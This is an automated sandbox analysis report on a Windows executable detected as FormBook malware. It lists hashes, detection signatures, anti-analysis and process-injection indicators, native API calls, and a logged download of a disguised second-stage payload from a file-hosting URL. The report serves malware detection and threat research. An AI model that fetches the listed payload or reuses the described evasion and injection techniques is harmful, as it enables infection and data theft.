Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562756
MD5: 0a089e934eb856c3e809d0fac53000c7
SHA1: 661f86072031587be18ada0b6606ee82bb52038f
SHA256: f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
Tags: exe, user-Bitsight
Infos:

Detection

FormBook
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)
    • file.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.3052844352.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Process Memory Space: file.exe PID: 3148 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
2.2.file.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.file.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.file.exe.6aa0000.8.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
                  No Sigma rule has matched
                  No Suricata rule has matched

                  AV Detection

                  Source: file.exe; ReversingLabs: Detection: 21%
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: file.exe; Joe Sandbox ML: detected
                  Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown; HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: file.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD7F2Ah0_2_06CD7EC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD20F2h0_2_06CD1EE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD20F2h0_2_06CD1EF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD7F2Ah0_2_06CD7EB1
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD9BD3h0_2_06CD94E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD7F2Ah0_2_06CD8065
                  Source: global traffic; HTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1 Host: files.catbox.moe Connection: Keep-Alive
                  Source: Joe Sandbox View; IP Address: 108.181.20.35
                  Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic; DNS traffic detected: DNS query: files.catbox.moe
                  Source: file.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: file.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                  Source: file.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/ne8lox.mp4
                  Source: file.exeString found in binary or memory: https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704

                  E-Banking Fraud

                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE7728 NtProtectVirtualMemory,0_2_06CE7728
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE9C90 NtResumeThread,0_2_06CE9C90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE7720 NtProtectVirtualMemory,0_2_06CE7720
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE9C88 NtResumeThread,0_2_06CE9C88
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042C7A3 NtClose,2_2_0042C7A3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2B60 NtClose,LdrInitializeThunk,2_2_012E2B60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_012E2DF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012E2C70
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E35C0 NtCreateMutant,LdrInitializeThunk,2_2_012E35C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E4340 NtSetContextThread,2_2_012E4340
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E4650 NtSuspendThread,2_2_012E4650
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2BA0 NtEnumerateValueKey,2_2_012E2BA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2B80 NtQueryInformationFile,2_2_012E2B80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2BE0 NtQueryValueKey,2_2_012E2BE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2BF0 NtAllocateVirtualMemory,2_2_012E2BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2AB0 NtWaitForSingleObject,2_2_012E2AB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2AF0 NtWriteFile,2_2_012E2AF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2AD0 NtReadFile,2_2_012E2AD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2D30 NtUnmapViewOfSection,2_2_012E2D30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2D00 NtSetInformationFile,2_2_012E2D00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2D10 NtMapViewOfSection,2_2_012E2D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2DB0 NtEnumerateKey,2_2_012E2DB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2DD0 NtDelayExecution,2_2_012E2DD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2C00 NtQueryInformationProcess,2_2_012E2C00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2C60 NtCreateKey,2_2_012E2C60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2CA0 NtQueryInformationToken,2_2_012E2CA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2CF0 NtOpenProcess,2_2_012E2CF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2CC0 NtQueryVirtualMemory,2_2_012E2CC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2F30 NtCreateSection,2_2_012E2F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2F60 NtCreateProcessEx,2_2_012E2F60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2FA0 NtQuerySection,2_2_012E2FA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2FB0 NtResumeThread,2_2_012E2FB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2F90 NtProtectVirtualMemory,2_2_012E2F90
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2FE0 NtCreateFile,2_2_012E2FE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2E30 NtWriteVirtualMemory,2_2_012E2E30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2EA0 NtAdjustPrivilegesToken,2_2_012E2EA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2E80 NtReadVirtualMemory,2_2_012E2E80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2EE0 NtQueueApcThread,2_2_012E2EE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3010 NtOpenDirectoryObject,2_2_012E3010
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3090 NtSetValueKey,2_2_012E3090
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E39B0 NtGetContextThread,2_2_012E39B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3D10 NtOpenProcessToken,2_2_012E3D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3D70 NtOpenThread,2_2_012E3D70
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 012F7E54 appears 111 times
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 0131EA12 appears 86 times
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 0129B970 appears 280 times
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 012E5130 appears 58 times
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 0132F290 appears 105 times
                  Source: file.exe, 00000000.00000002.3051807317.00000000067D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameZseobxu.dll" vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000000.2032690755.00000000003DC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000000.00000002.3035479477.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                  Source: file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.3036442391.00000000027D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
                  Source: file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000002.00000002.2500494014.000000000139D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                  Source: file.exe Binary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
                  Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.3812110.3.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.file.exe.3812110.3.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: classification engine Classification label: mal88.troj.evad.winEXE@3/0@1/1
                  Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
                  Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: file.exe ReversingLabs: Detection: 21%
                  Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: secur32.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, ListDecorator.cs .Net Code: Read
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                  Source: 0.2.file.exe.3812110.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                  Source: 0.2.file.exe.3812110.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                  Source: Yara match File source: 0.2.file.exe.6aa0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000002.3052844352.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: file.exe PID: 3148, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_069A1913 push eax; ret 0_2_069A191D
                  Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: file.exe PID: 3148, type: MEMORYSTR
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
